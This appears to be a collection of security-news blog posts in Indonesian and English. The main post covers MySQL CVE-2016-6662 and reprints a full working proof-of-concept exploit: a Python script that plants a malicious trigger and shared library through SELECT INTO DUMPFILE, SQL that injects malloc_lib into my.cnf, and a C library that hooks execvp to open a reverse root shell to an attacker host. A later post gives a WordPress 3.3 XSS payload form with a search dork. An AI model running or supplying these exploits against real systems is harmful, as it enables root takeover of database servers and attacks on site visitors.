Awas Pengguna TeamViewer, Ada Bug yang Bisa Bikin Komputermu Kena Hack

Pernah atau sedang menggunakan TeamViewer sebagai layanan ke Client? Hati-hati. Siap-siap update ke software terbaru. Ada bug cukup serius yang memungkinkan hacker untuk mengendalikan balik komputer yang tersambung via teamviewer.

Adalah om Gellin seorang pengguna Github yang mengungkapkan vulnerability ini ke publik. Sebuah proof of concept yang ditulisnya lewat Github disini, sudah di fork lebih dari 25 kali.

Continue reading Awas Pengguna TeamViewer, Ada Bug yang Bisa Bikin Komputermu Kena Hack

Dua Zero-Day Exploit Serang Database MySQL! (+ Solusi Sementara)

Dua zero-day exploit berbahaya baru saja ditemukan pada database terpopuler di dunia, MySQL. Hacker yang memanfaatkan celah ini dapat memperoleh akses database secara penuh, menjadi root dengan mudah. Bahaya sekali kawan…

Adalah om Dawid Golunski asal LegalHackers Polandia yang menemukan celah berbahaya ini. Dua exploit ini dimuat di CVE-2016-6662 dan CVE-2016-6663 dan menyasar seluruh versi MySQL sampai versi terbaru dan juga semua turunan/fork dari MySQL seperti MariaDB dan PerconaDB.

Kawan bisa baca lebih lanjut soal ulasan teknis dan source code dari proof of concept exploit ini disini.

CVE-2016-6662 menyasar kelemahan MySQL di konfigurasi MySQL (my.cnf) yang bisa diinject dengan setting khusus yang disiapkan oleh hacker, dimana kunci kelemahannya ada pada daemon mysqld_safe. Daemon ini digunakan sebagai wrapper untuk banyak sekali paket mysql atau untuk keperluan yang lebih umum (sampai sekarang) yaitu instalasi untuk start services MySQL.

Daemon mysqld_safe di eksekusi sebagai root dan jangan kaget, mysqld (daemon utama dari mysql) menghiraukan seluruh privilege-nya menjadi level mysql user. Seperti dikutip dari om Golunski berikut:

“If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot, etc.)”

Sekilas dari proof of concept yang bisa saya rangkum disini adalah sebagai berikut:
1. inject malicious configuration ke file konfigurasi mysql yang sudah ada dengan permission yang paling lemah namun berguna (seperti konfigurasi yang digunakan/ditulis oleh si mysql user).

Pada tahapan ini, hacker bisa Inject library mysql khusus yang disiapkan menjadi exploit selama-lamanya tanpa ketahuan (kalau tidak jeli) karena exploit berjalan sebagai modul dari MySQL

  1. Membuat file konfigurasi baru dengan MySQL data directory yang bisa ditulisi pada area konfigurasi __default__. Sangat berbahaya, karena untuk membuatnya tidak perlu konfigurasi permission yang khusus.

Masih menggunakan mysqld_safe dan melakukan trik khusus untuk membypass blokade SELECT xxx OUTFILE dari MySQL.

Contohnya:

mysql> set global general_log_file = '/var/lib/mysql/my.cnf';
mysql> set global general_log = on;
mysql> select '
    '> 
    '> ; injected config entry
    '> 
    '> [mysqld]
    '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so
    '> 
    '> [separator]
    '> 
    '> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;

Hasilnya, setting diatas bisa masuk ke my.cnf (:))

  1. Hacker hanya butuh permission akses SELECT/FILE saja untuk bisa menulisi konfigurasi utama MySQL (di bagian default).

Contoh trigger yang bisa dipakai:

CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
   ON `active_table` FOR EACH ROW
BEGIN
   DECLARE void varchar(550);
   set global general_log_file='/var/lib/mysql/my.cnf';
   set global general_log = on;
   select "
[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

" INTO void;   
   set global general_log = off;
END;

heheu, dilanjutkan dengan ini:

SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' 

Dan, trigger diatas akan dieksekusi manakala ada satu kali saja tabel itu diisi data baru (satu kali query INSERT INTO sudah cukup)

Solusi Sementara

Sampai saat berita dan Proof of Concept ini menyebar, Oracle belum merilis patch apapun. Namun untuk MariaDB dan PerconaDB sudah mengeluarkan warning dan patch khusus. Jadi solusi sementara yang bisa dilakukan adalah:

  1. Selalu backup dan restore file my.cnf dengan konfigurasi terbaik yang kita lakukan secara berkala, jaga-jaga jika ada entri baru yang masuk
  2. Update MySQL (menunggu Oracle merilis patch)
  3. Perketat keamanan CMS/Sistem Informasi utamanya pada SQL Injection (ingat, permission select aja udah cukup buat server rusak dg exploit diatas heuheu)
  4. Pindah ke MariaDB atau PerconaDB (sorry to say, Oracle is not too serious developing MySQL. They just bought and touch them when they need…)

Source Code

#!/usr/bin/python

# This is a limited version of the PoC exploit. It only allows appending to
# existing mysql config files with weak permissions. See V) 1) section of 
# the advisory for details on this vector. 
#
# Full PoC will be released at a later date, and will show how attackers could
# exploit the vulnerability on default installations of MySQL on systems with no
# writable my.cnf config files available.
#
# The upcoming advisory CVE-2016-6663 will also make the exploitation trivial
# for certain low-privileged attackers that do not have FILE privilege.
# 
# See full advisory for details:
# http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt
#
# Stay tuned 😉

intro = """
0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit

For testing purposes only. Do no harm.

Discovered/Coded by:

Dawid Golunski
http://legalhackers.com

"""

import argparse
import mysql.connector    
import binascii
import subprocess


def info(str):
    print "[+] " + str + "\n"

def errmsg(str):
    print "[!] " + str + "\n"

def shutdown(code):
    if (code==0):
        info("Exiting (code: %d)\n" % code)
    else:
        errmsg("Exiting (code: %d)\n" % code)
    exit(code)


cmd = "rm -f /var/lib/mysql/pocdb/poctable.TRG ; rm -f /var/lib/mysql/mysql_hookandroot_lib.so"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait() 


# where will the library to be preloaded reside? /tmp might get emptied on reboot
# /var/lib/mysql is safer option (and mysql can definitely write in there 😉
malloc_lib_path='/var/lib/mysql/mysql_hookandroot_lib.so'


# Main Meat

print intro

# Parse input args
parser = argparse.ArgumentParser(prog='0ldSQL_MySQL_RCE_exploit.py', description='PoC for MySQL Remote Root Code Execution / Privesc CVE-2016-6662')
parser.add_argument('-dbuser', dest='TARGET_USER', required=True, help='MySQL username') 
parser.add_argument('-dbpass', dest='TARGET_PASS', required=True, help='MySQL password')
parser.add_argument('-dbname', dest='TARGET_DB',   required=True, help='Remote MySQL database name')
parser.add_argument('-dbhost', dest='TARGET_HOST', required=True, help='Remote MySQL host')
parser.add_argument('-mycnf', dest='TARGET_MYCNF', required=True, help='Remote my.cnf owned by mysql user')
                  
args = parser.parse_args()


# Connect to database. Provide a user with CREATE TABLE, SELECT and FILE permissions
# CREATE requirement could be bypassed (malicious trigger could be attached to existing tables)
info("Connecting to target server %s and target mysql account '%s@%s' using DB '%s'" % (args.TARGET_HOST, args.TARGET_USER, args.TARGET_HOST, args.TARGET_DB))
try:
    dbconn = mysql.connector.connect(user=args.TARGET_USER, password=args.TARGET_PASS, database=args.TARGET_DB, host=args.TARGET_HOST)
except mysql.connector.Error as err:
    errmsg("Failed to connect to the target: {}".format(err))
    shutdown(1)

try:
    cursor = dbconn.cursor()
    cursor.execute("SHOW GRANTS")
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(2)

privs = cursor.fetchall()
info("The account in use has the following grants/perms: " )
for priv in privs:
    print priv[0]
print ""


# Compile mysql_hookandroot_lib.so shared library that will eventually hook to the mysqld 
# process execution and run our code (Remote Root Shell)
# Remember to match the architecture of the target (not your machine!) otherwise the library
# will not load properly on the target.
info("Compiling mysql_hookandroot_lib.so")
cmd = "gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait() 
if rc != 0:
    errmsg("Failed to compile mysql_hookandroot_lib.so: %s" % cmd)
    print error 
    shutdown(2)

# Load mysql_hookandroot_lib.so library and encode it into HEX
info("Converting mysql_hookandroot_lib.so into HEX")
hookandrootlib_path = './mysql_hookandroot_lib.so'
with open(hookandrootlib_path, 'rb') as f:
    content = f.read()
    hookandrootlib_hex = binascii.hexlify(content)

# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG 
# Decoded payload (paths may differ):
"""
DELIMITER //
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
   ON `poctable` FOR EACH ROW
BEGIN

   DECLARE void varchar(550);
   set global general_log_file='/var/lib/mysql/my.cnf';
   set global general_log = on;
   select "

# 0ldSQL_MySQL_RCE_exploit got here 🙂

[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

[abyss]
" INTO void;   
   set global general_log = off;

END; //
DELIMITER ;
"""
trigger_payload="""TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf\\nAFTER INSERT\\n   ON `poctable` FOR EACH ROW\\nBEGIN\\n\\n   DECLARE void varchar(550);\\n   set global general_log_file=\\'%s\\';\\n   set global general_log = on;\\n   select "\\n\\n# 0ldSQL_MySQL_RCE_exploit got here :)\\n\\n[mysqld]\\nmalloc_lib=\\'%s\\'\\n\\n[abyss]\\n" INTO void;   \\n   set global general_log = off;\\n\\nEND'
sql_modes=0
definers='root@localhost'
client_cs_names='utf8'
connection_cl_names='utf8_general_ci'
db_cl_names='latin1_swedish_ci'
""" % (args.TARGET_MYCNF, malloc_lib_path)

# Convert trigger into HEX to pass it to unhex() SQL function
trigger_payload_hex = "".join("{:02x}".format(ord(c)) for c in trigger_payload)

# Save trigger into a trigger file
TRG_path="/var/lib/mysql/%s/poctable.TRG" % args.TARGET_DB
info("Saving trigger payload into %s" % (TRG_path))
try:
    cursor = dbconn.cursor()
    cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (trigger_payload_hex, TRG_path) )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(4)

# Save library into a trigger file
info("Dumping shared library into %s file on the target" % malloc_lib_path)
try:
    cursor = dbconn.cursor()
    cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (hookandrootlib_hex, malloc_lib_path) )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(5)

# Creating table poctable so that /var/lib/mysql/pocdb/poctable.TRG trigger gets loaded by the server
info("Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded")
try:
    cursor = dbconn.cursor()
    cursor.execute("CREATE TABLE `poctable` (line varchar(600)) ENGINE='MyISAM'"  )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(6)

# Finally, execute the trigger's payload by inserting anything into `poctable`. 
# The payload will write to the mysql config file at this point.
info("Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config %s" % args.TARGET_MYCNF )
try:
    cursor = dbconn.cursor()
    cursor.execute("INSERT INTO `poctable` VALUES('execute the trigger!');" )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(6)

# Check on the config that was just created
info("Showing the contents of %s config to verify that our setting (malloc_lib) got injected" % args.TARGET_MYCNF )
try:
    cursor = dbconn.cursor()
    cursor.execute("SELECT load_file('%s')" % args.TARGET_MYCNF)
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(2)
finally:
    dbconn.close()  # Close DB connection
print ""
myconfig = cursor.fetchall()
print myconfig[0][0]
info("Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)")

# Spawn a Shell listener using netcat on 6033 (inverted 3306 mysql port so easy to remember 😉
info("Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)" )
listener = subprocess.Popen(args=["/bin/nc", "-lvp","6033"])
listener.communicate()
print ""

# Show config again after all the action is done
info("Shell closed. Hope you had fun. ")

# Mission complete, but just for now... Stay tuned 🙂
info("""Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;)""")


# Shutdown
shutdown(0)

mysql module:

/*

(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit
mysql_hookandroot_lib.c

This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit.
The library is meant to be loaded by mysqld_safe on mysqld daemon startup
to create a reverse shell that connects back to the attacker's host on
6603 port (mysql port in reverse 😉 and provides a root shell on the
target. 

mysqld_safe will load this library through the following setting:

[mysqld]
malloc_lib=mysql_hookandroot_lib.so

in one of the my.cnf config files (e.g. /etc/my.cnf).

This shared library will hook the execvp() function which is called
during the startup of mysqld process. 
It will then fork a reverse shell and clean up the poisoned my.cnf
file in order to let mysqld run as normal so that:
'service mysql restart' will work without a problem.

Before compiling adjust IP / PORT and config path.


~~
Discovered/Coded by:

Dawid Golunski
http://legalhackers.com


~~
Compilation (remember to choose settings compatible with the remote OS/arch):

gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl

Disclaimer:

For testing purposes only. Do no harm.

Full advisory URL:
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt

*/

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ATTACKERS_IP "127.0.0.1"
#define SHELL_PORT 6033
#define INJECTED_CONF "/var/lib/mysql/my.cnf"

char* env_list[] = { "HOME=/root", NULL };
typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]);
static execvp_func_t old_execvp = NULL;


// fork & send a bash shell to the attacker before starting mysqld
void reverse_shell(void) {

    int i; int sockfd;
    //socklen_t socklen;
    struct sockaddr_in srv_addr;
    srv_addr.sin_family = AF_INET; 
    srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port
    srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip 

    // create new TCP socket && connect
    sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
    connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
	
    for(i = 0; i <= 2; i++) dup2(sockfd, i);
    execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list );

    exit(0);
}


/*
 cleanup injected data from the target config before it is read by mysqld
 in order to ensure clean startup of the service

 The injection (if done via logging) will start with a line like this:

 /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:

*/

int config_cleanup() {

    FILE *conf;
    char buffer[2000];
    long cut_offset=0;

    conf = fopen(INJECTED_CONF, "r+");
    if (!conf) return 1;

    while (!feof(conf)) {
       fgets(buffer, sizeof(buffer), conf);
       if (strstr(buffer,"/usr/sbin/mysqld, Version")) {
	  cut_offset = (ftell(conf) - strlen(buffer));
       }

    }
    if (cut_offset>0) ftruncate(fileno(conf), cut_offset);
    fclose(conf);
    return 0;

}


// execvp() hook
int execvp(const char* filename, char* const argv[]) {

    pid_t  pid;
    int fd;

    // Simple root PoC (touch /root/root_via_mysql)
    fd = open("/root/root_via_mysql", O_CREAT);
    close(fd);

    old_execvp = dlsym(RTLD_NEXT, "execvp");

    // Fork a reverse shell and execute the original execvp() function
    pid = fork();
    if (pid == 0) 
          reverse_shell();

    // clean injected payload before mysqld is started
    config_cleanup();
    return old_execvp(filename, argv);
}

Sumber:
– LegalHackers.com (http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)
– The Hacker News (http://thehackernews.com/2016/09/hack-mysql-database.html)

Beware of SQL Injection for WordPress SEO by Yoast Plugin Users!

A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers.

The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO).

The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’.

All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw.

via TheHackerNews.com

Facebook Hadiahi Peneliti Keamanan 400 Juta untuk Remote Code Execution Flow Yang Ia Temukan

Facebook memberikan penghargaan kepada seorang insinyur komputer dan peneliti keamanan asal Brazil, Reginaldo Silva dengan uang sebesar 33.500 Dollar Amerika atau senilai 400 Juta rupiah lebih karena telah menemukan dan melaporkan vulnerability di Facebook.

Dengan semakin sulitnya menemukan sebuah bug ataupun lubang keamanan hari-hari ini, apa yang dilakukan Facebook dengan penghargaan sebesar itu adalah satu penghargaan yang terbesar sampai saat ini.  Continue reading Facebook Hadiahi Peneliti Keamanan 400 Juta untuk Remote Code Execution Flow Yang Ia Temukan

New Malware from USB Drives is Targeting Windows XP ATM

Some types of automated teller machine (ATM) malware are designed to steal sensitive information. However, there are some threats that enable the attacker to command the machine to simply hand over money.

Last week, at the Chaos Communication Congress (CCC), a couple of German researchers revealed finding a piece of malware that gives cybercriminals the ability to gain control of an ATM and instruct it to dispense money.

According to Wired, the malicious element is installed on a USB drive. The attacker goes to a vulnerable ATM running Windows XP, and cuts a piece of its chassis to gain access to its USB port. Continue reading New Malware from USB Drives is Targeting Windows XP ATM

Android Versi Lawas Rawan Kena Virus

Jutaan pengguna smartphone Android rawan menjadi korban kejahatan dunia mayaseperti yang dilancarkan melalui virus dan malware. Hal tersebut disampaikan oleh buletin internal yang disusun oleh Departemen Keamanan Dalam Negeri Amerika Serikat dan FBI.

Sebagaimana dikutip Business Insider dari situs Public Intelligence, Android—sebagaisistem operasi mobile yang paling banyak beredar—terus menjadi target serangan karena “pangsa pasar dan arsitektur open source miliknya”.

“Sebanyak 44 persen pengguna Android masih memakai sistem operasi 2.3.3 hingga 2.3.7—dikenal dengan nama Gingerbread—yang dirilis pada 2011 dan memiliki sejumlah celah keamanan yang diperbaiki pada versi setelahnya,” tulis buletin tersebut. Continue reading Android Versi Lawas Rawan Kena Virus

Awas, Virus Sabotase SMS di Android

Jakarta – Sebuah program jahat baru yang menyasar Android kembali ditemukan. Trojan ini mensabotase fitur SMS di ponsel yang diinfeksinya dan ujung-ujungnya bakal membuat kantong si pemilik ponsel jebol.

Dikenal dengan nama HippoSMS, virus ini menyusupi fitur pesan singkat perangkat Android untuk kemudian mengambil alih dan mendaftarkan diri ke layanan SMS premium.

Yang namanya SMS premium, tentu ada biaya di atas rata-rata yang harus ditanggung si pemilik ponsel. Namun jahatnya lagi, aksi merugikan HippoSMS tak lantas berhenti di situ. Continue reading Awas, Virus Sabotase SMS di Android

How to Fix STOP: 0x0000006B Windows 7 BSOD Error

Previously here we have covered several fixes for Windows, like Windows 7 Startup black screen of death, Windows 7 endless reboot after upgrade from Windows Vista, Windows 7 is not genuine error etc. Now here is yet another fix for Windows 7.

Microsoft has identified an issue on Windows 7 which crashes (BSOD) during start process with STOP: 0x0000006B error message and fails to boot. The complete error message looks like below, Continue reading How to Fix STOP: 0x0000006B Windows 7 BSOD Error

BackWPup Vulnerabilities?

A remote execution vulnerability has been discovered in WordPress backup utility BackWPup.

According to Sydney (Australia) company Sense of Security, which published the advisory along with a proof-of-concept, the vulnerability allows local or remote PHP files to be passed to a component of the utility.

“The input passed to the component wp_xml_export.php via the ‘wpabs’ variable allows the inclusion and execution of local or remote PHP files as long as a ‘_nonce’ value is known. The ‘_nonce’ value relies on a static constant which is not defined in the script meaning that it defaults to the value ‘822728c8d9’”, the advisory states.

Sense of Security says the vulnerability affects at least BackWPup Version 1.6.1 (the platform on which it has been tested), and users should upgrade to Version 1.7.1. Via TheRegister

Waspada Bug di Mundi Mail, Lagi

Baru saja saya mendapat informasi dari teman tentang vulnerabilities pada aplikasi Mundi. Mundi, adalah aplikasi pengelola e-mail yang digunakan oleh pelbagai perusahaan/institusi.

Kali ini, Mundi yang ngebug adalah Mundi 0.8.2 (mungkin sebelumnya juga). Cukup fatal tampaknya, karena penyerang bisa melakukan eksekusi perintah secara remote dan berulang. Kesalahan ini diakibatkan pada Input Validation yang kurang sempurna. Continue reading Waspada Bug di Mundi Mail, Lagi

WordPress 3.3 XSS Vulnerability Example & Proof of Concept

This is proof of concept of XSS Vulnerability of WordPress 3.3, wrote by Aditya Modha and Samir Shah. Enjoy it:

# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: intext:”Proudly powered by WordPress”
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Greetz: Jigar Soni, Mr 52
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE : Nope.

Step 1: Post a comment to the target website

Step 2: Replace the value of author tag, email tag, comment tag with the exact value of what has been post in the last comment. Change the value of comment_post_ID to the value of post (which can be known by opening that post and checking the value of p parameter in the url). For example the if the url is http://192.168.1.102/wordpress/?p=6 then the value of comment_post_ID is 6.

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://host/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<input type="button" value="Click Me" />
</form>

</body>
</html>

Step 3: Publish the above html file on the web server and access it. Click on “Click Me” button. This will try to post the comment to wordpress which will flag this comment as duplicate comment with the 500 Internal server error response. Here our XSS payload will get executed. Check wordpress_3.3_xss.png file.

Step 4: The response code where XSS payload reflects is given below

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>WordPress &rsaquo; Error</title>
 <style type="text/css">
  html {
   background: #f9f9f9;
  }
  body {
   background: #fff;
   color: #333;

               ..............snip....................

  .button {
   background: #f2f2f2 url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
  }

  .button:active {
   background: #eee url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
  }
   </style>
</head>
<body id="error-page">
 <p>Duplicate comment detected; it looks as though you&#8217;ve already said that!</p></body>
</html>

UPDATE: It will even work if you do not supply any comment data. Duplicate comment event is not necessary. And i forgot to mention that this will only work with Internet Explorer since other browser like firefox and chrome will url encode our XSS payload.

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://host/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="oldman">
<input type="hidden" name="email" value="oldmanlab@gmail.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace_me">
<input type="hidden" name="comment_parent" value="0">
<input type="submit" value="Click Me" />
</form>

</body>
</html>

Please respect the system administrator, don’t crack too much and warn him. Update your WordPress A.S.A.P!

Lubang Keamanan XSS Pada WordPress 3.2.1

Bagi para pengguna WordPress, khususnya pengguna versi 3.2.1 harap segera lakukan update script. Ada lubang keamanan XSS yang dapat memberi kesempatan guest menulis dihalaman artikel, halaman arsip dan tag.

Silakan lebih lengkap baca tentang XSSnya disini: http://wordpress.or.id/xss-vulnerability-pada-wordpress-3-2-1.html